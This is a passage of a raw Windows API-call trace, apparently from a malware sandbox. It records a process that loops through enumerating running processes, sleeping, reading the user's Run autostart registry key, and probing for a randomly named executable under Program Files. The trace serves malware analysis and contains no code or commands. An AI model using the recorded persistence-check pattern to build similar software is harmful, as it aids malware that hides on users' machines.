ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x4e0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0302.688] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0xc0000004 [0302.701] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0302.701] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x4e0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0302.702] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0x0 [0302.849] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0302.850] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0302.852] NtCreateKey (in: KeyHandle=0xdea70, DesiredAccess=0x20219, ObjectAttributes=0xde1e0*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea70*=0x338) returned 0x0 [0302.853] NtEnumerateValueKey (in: KeyHandle=0x338, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde434, Length=0x200, ResultLength=0xde834 | out: KeyValueInformation=0xde434, ResultLength=0xde834) returned 0x0 [0302.853] NtClose (Handle=0x338) returned 0x0 [0302.854] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtPathName=0xde81c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0302.854] NtCreateFile (in: FileHandle=0xde83c, DesiredAccess=0x120089, ObjectAttributes=0xde804*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xde824, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xde83c*=0x0, IoStatusBlock=0xde824*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0302.854] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x5de6a0) returned 1 [0302.854] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtPathName=0xdea38, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0302.854] NtCreateFile (in: FileHandle=0xdea58, DesiredAccess=0x120089, ObjectAttributes=0xdea20*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xdea40, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xdea58*=0x0, IoStatusBlock=0xdea40*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0302.854] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x5deaa0) returned 1 [0302.854] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x4e0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0302.854] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0xc0000004 [0302.857] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0302.857] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x4e0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0302.857] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0x0 [0302.961] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0302.961] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0302.963] NtCreateKey (in: KeyHandle=0xdea70, DesiredAccess=0x20219, ObjectAttributes=0xde1e0*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea70*=0x338) returned 0x0 [0302.964] NtEnumerateValueKey (in: KeyHandle=0x338, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde434, Length=0x200, ResultLength=0xde834 | out: KeyValueInformation=0xde434, ResultLength=0xde834) returned 0x0 [0302.964] NtClose (Handle=0x338) returned 0x0 [0302.964] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtPathName=0xde81c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0302.964] NtCreateFile (in: FileHandle=0xde83c, DesiredAccess=0x120089, ObjectAttributes=0xde804*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xde824, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xde83c*=0x0, IoStatusBlock=0xde824*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0302.964] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x5de4a0) returned 1 [0302.964] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtPathName=0xdea38, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0302.964] NtCreateFile (in: FileHandle=0xdea58, DesiredAccess=0x120089, ObjectAttributes=0xdea20*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xdea40, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xdea58*=0x0, IoStatusBlock=0xdea40*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0302.964] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x5de420) returned 1 [0302.964] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x4e0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0302.965] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0xc0000004 [0302.967] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0302.967] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x4e0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0302.967] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0x0 [0303.112] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0303.113] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0303.115] NtCreateKey (in: KeyHandle=0xdea70, DesiredAccess=0x20219, ObjectAttributes=0xde1e0*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea70*=0x338) returned 0x0 [0303.116] NtEnumerateValueKey (in: KeyHandle=0x338, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde434, Length=0x200, ResultLength=0xde834 | out: KeyValueInformation=0xde434, ResultLength=0xde834) returned 0x0 [0303.116] NtClose (Handle=0x338) returned 0x0 [0303.116] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtPathName=0xde81c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0303.116] NtCreateFile (in: FileHandle=0xde83c, DesiredAccess=0x120089, ObjectAttributes=0xde804*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xde824, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xde83c*=0x0, IoStatusBlock=0xde824*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0303.116] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x5de7a0) returned 1 [0303.116] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtPathName=0xdea38, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0303.116] NtCreateFile (in: FileHandle=0xdea58, DesiredAccess=0x120089, ObjectAttributes=0xdea20*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xdea40, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xdea58*=0x0, IoStatusBlock=0xdea40*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0303.117] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x5ddfa0) returned 1 [0303.117] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x4e0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0303.117] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0xc0000004 [0303.121] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0303.121] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x4e0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0303.122] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0x0 [0303.263] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0303.264] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0303.266] NtCreateKey (in: KeyHandle=0xdea70, DesiredAccess=0x20219, ObjectAttributes=0xde1e0*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea70*=0x338) returned 0x0 [0303.268] NtEnumerateValueKey (in: KeyHandle=0x338, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde434, Length=0x200, ResultLength=0xde834 | out: KeyValueInformation=0xde434, ResultLength=0xde834) returned 0x0 [0303.268] NtClose (Handle=0x338) returned 0x0 [0303.268] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtPathName=0xde81c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0303.268] NtCreateFile (in: FileHandle=0xde83c, DesiredAccess=0x120089, ObjectAttributes=0xde804*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xde824, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xde83c*=0x0, IoStatusBlock=0xde824*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0303.269] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x5deba0) returned 1 [0303.269] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtPathName=0xdea38, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0303.269] NtCreateFile (in: FileHandle=0xdea58, DesiredAccess=0x120089, ObjectAttributes=0xdea20*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xdea40, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xdea58*=0x0, IoStatusBlock=0xdea40*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0303.269] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x5de120) returned 1 [0303.269] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x4e0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0303.269] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0xc0000004 [0303.272] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0303.272] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x4e0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0303.273] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0x0 [0303.411] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0303.412] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0303.414] NtCreateKey (in: KeyHandle=0xdea70, DesiredAccess=0x20219, ObjectAttributes=0xde1e0*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea70*=0x338) returned 0x0 [0303.415] NtEnumerateValueKey (in: KeyHandle=0x338, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde434, Length=0x200, ResultLength=0xde834 | out: KeyValueInformation=0xde434, ResultLength=0xde834) returned 0x0 [0303.415] NtClose (Handle=0x338) returned 0x0 [0303.416] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtPathName=0xde81c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0303.416] NtCreateFile (in: FileHandle=0xde83c, DesiredAccess=0x120089, ObjectAttributes=0xde804*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xde824, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xde83c*=0x0, IoStatusBlock=0xde824*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0303.416] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x5de6a0) returned 1 [0303.416] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtPathName=0xdea38, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0303.416] NtCreateFile (in: FileHandle=0xdea58, DesiredAccess=0x120089, ObjectAttributes=0xdea20*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xdea40, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xdea58*=0x0, IoStatusBlock=0xdea40*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0303.416] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x5de6a0) returned 1 [0303.416] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x4e0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0303.416] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0xc0000004 [0303.419] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0303.420] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x4e0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0303.420] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0x0 [0303.564] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0303.565] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0303.566] NtCreateKey (in: KeyHandle=0xdea70, DesiredAccess=0x20219, ObjectAttributes=0xde1e0*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea70*=0x338) returned 0x0 [0303.567] NtEnumerateValueKey (in: KeyHandle=0x338, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde434, Length=0x200, ResultLength=0xde834 | out: KeyValueInformation=0xde434, ResultLength=0xde834) returned 0x0 [0303.567] NtClose (Handle=0x338) returned 0x0 [0303.567] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtPathName=0xde81c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0303.567] NtCreateFile (in: FileHandle=0xde83c, DesiredAccess=0x120089, ObjectAttributes=0xde804*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xde824, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xde83c*=0x0, IoStatusBlock=0xde824*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0303.568] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x5de3a0) returned 1 [0303.568] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtPathName=0xdea38, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0303.568] NtCreateFile (in: FileHandle=0xdea58, DesiredAccess=0x120089, ObjectAttributes=0xdea20*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xdea40, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xdea58*=0x0, IoStatusBlock=0xdea40*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0303.568] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x5de2a0) returned 1 [0303.568] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x4e0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0303.569] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0xc0000004 [0303.573] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0303.574] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x4e0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0303.574] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0x0 [0303.708] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0303.709] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0303.715] NtCreateKey (in: KeyHandle=0xdea70, DesiredAccess=0x20219, ObjectAttributes=0xde1e0*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea70*=0x338) returned 0x0 [0303.717] NtEnumerateValueKey (in: KeyHandle=0x338, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde434, Length=0x200, ResultLength=0xde834 | out: KeyValueInformation=0xde434, ResultLength=0xde834) returned 0x0 [0303.717] NtClose (Handle=0x338) returned 0x0 [0303.717] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtPathName=0xde81c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0303.717] NtCreateFile (in: FileHandle=0xde83c, 